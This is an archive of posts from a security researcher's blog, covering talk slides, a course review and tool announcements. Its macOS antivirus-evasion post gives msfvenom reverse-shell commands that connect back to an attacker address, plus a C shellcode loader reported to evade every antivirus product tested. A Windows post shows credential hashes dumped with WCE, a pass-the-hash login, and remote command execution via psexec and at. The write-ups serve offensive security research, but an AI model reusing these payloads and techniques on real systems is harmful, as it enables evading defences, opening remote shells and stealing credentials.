This time I prepared some slides, download here:
BHUSA19_Arsenal_AVET
Author Archives: Daniel
Slides – Introduction to AVET
Florian and I were at the root.cologne meet-up for giving an introduction to AVET:
Slides: avet introduction – root cologne
Interesting talks afterwards, nice location and pizza!
Now looking forward to black hat :).
Wifi Hotspot with Windows 7
More a short note to myself… but might also be interesting for other folks.
You can make a Wifi Hotspot with Windows 7 with som cmd foo, but also with the programm Virtual Router Manager, which is easier:
Download:
https://softfamous.com/virtual-router-manager/
https://www.pcwelt.de/downloads/Virtual-Router-Manager-583195.html
Or search on google…
Windows 7 IE Developer SSH Server
Recently I played with one of the Windows 7 32Bit IE Developer VMs (IE11.Win7.VirtualBox.zip) from here. I can remember two exploitation classes where these machines are being used.
I found an SSH server installed within the machine, it is not hidden or something, but on the other side no one I asked was aware about it.
As you can see the server is running on port 22:
The SSH server itself is running with its own user:
The SSH service is not blocked by local firewall rules:
Short reminder, the password is “Passw0rd!”. So better use these machines in NAT mode, change the password, adjust firewall etc..
Happy Hacking.
A new project: welearnsecurity.com
Antivirus Evasion on OSX
A few months ago I did some research on antivirus (evasion) on OSX and now I decided to write a blog post about it.
Scope
* build executables that are not recognized by Antivirus Mac OSX
* for building Mac OSX executables you need Mac OSX
* shellcode/payload with MSF
* developed with C & some assembly
* main focus is learning and automatiziation
Why?
Some high profile targets use OSX… so AV might be a thing.
Dmitry Medvedev:
http://obamapacman.com/2009/08/russia-president-dmitry-medvedev-mac-user-kremlin/
As do some security researchers 😉
Charlie Miller:
Targeted Malware
… or like APT 28:
Test Cases and PoCs
* eicar
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o osx64_reverse_xor.out
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -f macho -o osx64_reverse.out
* msfvenom -p osx/x86/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 –platform OSX -f macho -o osx86_reverse.out
* gcc -o osx64_sc_binder.out osx64_sc_binder.c
osx64_sc_binder.c
#include <string.h> #include <sys/mman.h> unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff" ... "\x15"; int main(int argc, char **argv) { void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0); memcpy(ptr,buf,sizeof buf); void (*fp)() = (void (*)())ptr; fp(); }
And then some testing….
Comodo
… found nothing, only eicar.
Sophos
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c
Avast
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c
Avira
Not recognized:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
… no further testing.
Finally
As can be seen, not much efford is needed for evading AV software on MacOSX, The shellcode binder was enough for evading all tested platforms.
The binder: https://github.com/govolution/avepoc/blob/master/osx64_sc_binder.c
Nevertheless I made a small PoC version of AVET (based on the old version 1.3) for OSX (https://github.com/govolution/avetosx):
Maybe I will try to integrate it in AVET 2 some time.
Review EDX Course Security in Office 365 (Microsoft CLD245x)
-
Threats and data breaches targeting your data
-
Office 365 Advanced Threat Protection
-
Office 365 Threat Intelligence
-
Auditing, alerting and reporting in Office 365
-
Advanced Security Management in Office 365
-
how threat actors gain access
-
kill chain
-
how the work and threat landscape changed
-
on-premises environment vs “gray area” (cloud etc.) in terms of controll and security
-
phishing
-
malware
-
spoofing
-
escalation of privilege
-
data exfiltration
-
data deletion including ransom ware
-
data spillage (“Data spillage occurs when protected data is transferred to a system that doesn’t provide the same level of protection as the source.”)
-
as well as password cracking
-
malicious insiders
-
Exchange Online Protection (EOP)
-
Office 365 Advanced Threat Protection (Office 365 ATP)
-
Office 365 Threat Intelligence
-
Auditing and alerts
-
Advanced Security Management (ASM)
-
EOP (not End Of Protection 😉 but Exchange Online Protection)
-
Office 365 Threat Intelligence
-
Threat Dashboard
-
Auditing and alerts
-
Advanced Security Management (AMS)
-
Threat detection
-
Enhanced control
-
Discovery and insights
-
Overview of Office 365 Secure Score
-
security related measurements
-
Office 365 Secure Score API
-
API & powershell
-
downstream data for other tools and SIEM etc.
-
The Secure Score dashboard
-
The Secure Score analyzer tab
- Increasing your security posture
- I liked some of the points:
-
Enabling multi-factor authentication on all admin accounts
-
Designating more than one global admin
-
Enabling auditing across workloads
-
Enabling mailbox auditing
-
Having a weekly review of sign-ins after multiple failures
-
Having a weekly review of sign-ins from unknown sources
-
Having a weekly review of sign-ins from multiple geographies
-
-
The anti-malware pipeline in Office 365
-
Zero-hour auto purge
-
ZAP, detect spam or malware that was undetected by heuristics and delivery patterns
-
Phishing and spoofing protection
-
SFP, DKIM, DMARC
-
Spoof Intelligence
-
Give overview of spoofing attempts, allow spoofing for certain senders for certain addresses
-
Managing spoof intelligence
-
How ATP expands protection provided by EOP
-
Safe attachments
-
sandbox/detonation chamber 😀
-
Safe attachment policy options
-
Safe links
-
URL detonation -> mix of safe links and sage attachements
-
Safe links policy options
-
Creating safe attachment policies in the Security and Compliance Center
-
Creating safe attachments policies using Windows PowerShell
-
Modifying an existing safe attachments policy in the Security and Compliance Center
-
Creating a transport rule to bypass safe attachments
-
Safe attachments end user experience
- Creating safe links policies by using the Security and Compliance Center
- Creating safe links policies using Windows PowerShell
- Modifying an existing safe links policy
- Create a transport rule to bypass safe links
- Safe links user experience in email
- Safe links user experience in Office 2016
- Threat protection status report
- ATP message disposition report
- ATP file types report
- Malware detections report
- Top Malware report
- Top Senders and Recipients report
- Spoof Mail report
- Spam Detections report
- Sent and received email report
- Security & Compliance Report Demonstration
- Microsoft Intelligent Security Graph
- Source: Windows, Office 365, Cloud Services, 3rd party
- Threat dashboard
- reporting tool for C-level
- Threat explorer
- analysts, admins
- Threat detections in your tenant
- Security and malware trends
- Alerts
- More insights
- Threat Intelligence Demonstration
- Viewing options in Threat explorer
- Filtering capabilities in Threat Explorer
- Drilling for details
- Incident reports
- Auditing architecture in Office 365
- Audited activities
- Office 365 Management Activity API
- Mailbox actions logged by mailbox audit logging
- Enabling mailbox auditing
- Specifying owner actions to audit
- Changing the age limit for entries in the mailbox audit log
- Enabling auditing in your tenant
- Granting permissions
- Searching the audit log
- Viewing the search results
- Filtering the search results
- Exporting the search results to a file
- Searching the audit log by using Windows PowerShell
- Using a SIEM application to access your auditing data
- The SharePoint sharing schema
- The SharePoint Sharing model and sharing events
- How to identify resources shared with external users
- Introduction to insights and alerts
- Types of insights that are available
- Types of alerts that are generated
- Alerts features in the Security & Compliance Center
- Alert policy settings
- Default alert policies
- Viewing alerts
- Managing alerts
- Lesson introduction
- Anomaly detection policies
- Login authentication failures
- Administrator activity
- Inactive accounts
- Location
- Impossible travel
- Device and user agent
- Activity policies
- Anomaly detection and activity alerts
- Policy templates
- Productivity app discovery
- App permissions
- Enabling and accessing Advanced Security Management
- Creating anomaly detection policies
- Creating activity policies
- Reviewing and taking action on alerts
- Investigating activities in the Activity log
- Grouping IP addresses to simplify management
- Log file requirements
- Supported vendors and their data attributes
- Creating app discovery reports
- Reviewing app discovery findings
- Troubleshooting errors when log files are uploaded
- App permissions architecture
- Managing app permissions
- Approving or banning an app
From my side more insight on the security mechanisms and more detail on Threat Intelligence would have been great. The course goes into logging and how to find strange behaviour, malware and threat intelligence. Which was really nice to see how much effort Microsoft put into securing their cloud products.
A lot of the questions in the module assessements questions are more about configuration the platform itself or how tabs are named, I felt a bit like in a MS exam long time ago. Large parts of the content is text and not videos, most courses are a bit different here.
Testing some hashdump and lateral movement techniques
Some time ago I tested some techniques, now published quick & dirty as a note to whom it might be interesting.
Test WCE
Source: http://www.ampliasecurity.com
E:\wce_v1_42beta_x32>wce
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
dax:DAX-RYMZ48Z3EYO:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
DAX-RYMZ48Z3EYO$:ACME:00000000000000000000000000000000:4460E0BCB8CCF37D8A9E81XXXXXXXXXX
E:\wce_v1_42beta_x32>wce -s Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of current logon session (00168AB3h) to:
Username: Administrator
domain: ACME
LMHash: E52CAC67419A9A224A3B10XXXXXXXXXX
NTHash: 8846F7EAEE8FB118AB06BDXXXXXXXXXX
NTLM credentials successfully changed!
E:\wce_v1_42beta_x32>dir \\192.168.16.2\c$
Volume in Laufwerk \\192.168.16.2\c$: hat keine Bezeichnung.
Volumeseriennummer: 5450-733C
Verzeichnis von \\192.168.16.2\c$
21.05.2016 14:44 0 AUTOEXEC.BAT
21.05.2016 15:56
ClientApps
21.05.2016 14:44 0 CONFIG.SYS
21.05.2016 15:00Dokumente und Einstellungen
21.05.2016 17:33 2.229.504 Exchange Server Setup Progress.log
21.05.2016 15:24fax
21.05.2016 15:51Inetpub
21.05.2016 15:52Programme
21.05.2016 15:51Users Shared Folders
21.05.2016 17:33WINDOWS
21.05.2016 14:50wmpub
3 Datei(en) 2.229.504 Bytes
8 Verzeichnis(se), 16.708.521.984 Bytes frei
But for remote execution psexec is needed:
E:\wce_v1_42beta_x32>..\PSTools\psexec \\192.168.16.2 ipconfig
PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - http://www.sysinternals.com
Windows-IP-Konfiguration
Ethernet-Adapter LAN-Verbindung des Servers:
Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
ipconfig exited on 192.168.16.2 with error code 0.
E:\wce_v1_42beta_x32>copy wce.exe \\192.168.16.2\c$
1 Datei(en) kopiert.
-> worked
E:\wce_v1_42beta_x32>del wce.exe \\192.168.16.2\c$
Möchten Sie "\\192.168.16.2\c$\*" löschen (J/N)? J
E:\wce_v1_42beta_x32>md \\192.168.16.2\c$\temp
Running commands with at
E:\wce_v1_42beta_x32>at \\192.168.16.2 18:35 cmd /c "ipconfig > c:\temp\ipconf.t
xt"
Neuer Auftrag hinzugefügt. Kennung = 1
E:\wce_v1_42beta_x32>move \\192.168.16.2\c$\temp\ipconf.txt .
E:\wce_v1_42beta_x32>type ipconf.txt
Windows-IP-Konfiguration
Ethernet-Adapter LAN-Verbindung des Servers:
Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
Test pwdump
Source (seems to be down):
http://52.25.198.231/blog/2015/09/02/reading-windows-password/
https://github.com/khuangia/wce
Fork:
https://github.com/govolution/wce
32Bit only as far as I remember.
C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl getpwd.cpp /link ps
api.lib advapi32.lib
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
getpwd.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.
/out:getpwd.exe
psapi.lib
advapi32.lib
getpwd.obj
C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl /LD getpwd_dll.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
getpwd_dll.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.
/out:getpwd_dll.dll
/dll
/implib:getpwd_dll.lib
getpwd_dll.obj
Creating library getpwd_dll.lib and object getpwd_dll.exp
-> then use it ;).
Recommended Talks for the New Year (mainly 35C3)
Like last here here some recommendations for starting into 2019. Mainly from 35C3 and one from Bluehat.
See the original thread from twitter here (It’s a bit messed up, but should be complete):
Avet setup.sh script
Now there is a setup.sh script for easier installation of AVET (thanks to https://github.com/tacticaljmp). Tested with kali linux 2018.3a.
I made two short videos:
After starting the script you may have to wait for a couple of minutes. Then click trough the installation routine for the compiler:
… and you are done.
Download AVET: https://github.com/govolution/avet